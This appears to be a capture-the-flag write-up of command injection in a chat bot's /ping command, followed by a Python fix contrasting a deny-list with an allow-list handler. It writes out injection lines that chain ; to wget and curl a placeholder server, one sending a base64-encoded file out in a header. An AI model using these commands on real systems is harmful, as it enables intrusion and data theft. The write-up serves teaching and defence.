Some bot [web]

Some bot

It’s a well-known fact that Sherlock was on something to have these kinds of superpowers. However, it’s only partly true because he messed up somewhere.

  • URL: https://vk.com/club188138010

Command injection

The bot has a /ping 127.0.0.1 command. We can terminate the shell command with ; (| is blacklisted) to achieve code execution. To test this, we can issue:

/ping 127.0.0.1;wget "http://my_server/lol"

We send ls, see that flag.jpg is in the directory, and send it to our server as base64.

Exploit

/ping 127.0.0.1;a=$(base64 -w0 flag.jpg); curl -H "Flag: $a" "http://my_server/lol"

Pro-tip: listen on the server using ngrep -qt -W byline port 80 to easily see incoming connections.

Locally we convert the base64 to an image file.

Flag

FLAG{c0mmand_injecti0n_in_b0t}
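
Fix

The root cause described under "Command injection" is a deny-list in front of a shell string. The sketch below is an added example, not the bot's actual code: the bot's language, the function names and the exact ping invocation are assumptions. It puts that pattern next to a handler that accepts only a literal IP address and runs ping without a shell.

```python
import ipaddress
import subprocess

BLACKLIST = {"|"}  # assumption: the write-up only says "|" is blacklisted

def vulnerable_command(arg):
    """Assumed 'before' pattern: deny-list check, then a string for a shell."""
    if BLACKLIST & set(arg):
        raise ValueError("blacklisted character")
    # Run with shell=True, the shell (not ping) decides where the command
    # ends, so ";" starts a second command.
    return "ping -c 1 " + arg

def hardened_argv(arg):
    """Allow-list: accept only a literal IPv4/IPv6 address, return an argv list."""
    addr = ipaddress.ip_address(arg.strip())  # raises ValueError otherwise
    return ["ping", "-c", "1", str(addr)]

def handle_ping(arg):
    """Hardened handler: fixed argv, no shell, bounded runtime."""
    try:
        argv = hardened_argv(arg)
    except ValueError:
        return "usage: /ping <ip address>"
    done = subprocess.run(argv, capture_output=True, text=True, timeout=10)
    return done.stdout

def passes(check, arg):
    try:
        check(arg)
        return True
    except ValueError:
        return False

def compare(samples):
    """Map each input to (accepted by deny-list, accepted by allow-list)."""
    return {s: (passes(vulnerable_command, s), passes(hardened_argv, s))
            for s in samples}

# Constructed inputs; the second is the test command from the write-up.
SAMPLES = ["127.0.0.1", '127.0.0.1;wget "http://my_server/lol"',
           "127.0.0.1|ls", "::1"]

if __name__ == "__main__":
    for arg, (deny, allow) in compare(SAMPLES).items():
        print(f"{arg!r:45} deny-list={deny} allow-list={allow}")
```

The deny-list accepts the ; input unchanged, while the allow-list rejects everything that is not an address, so no shell metacharacter ever reaches a command line.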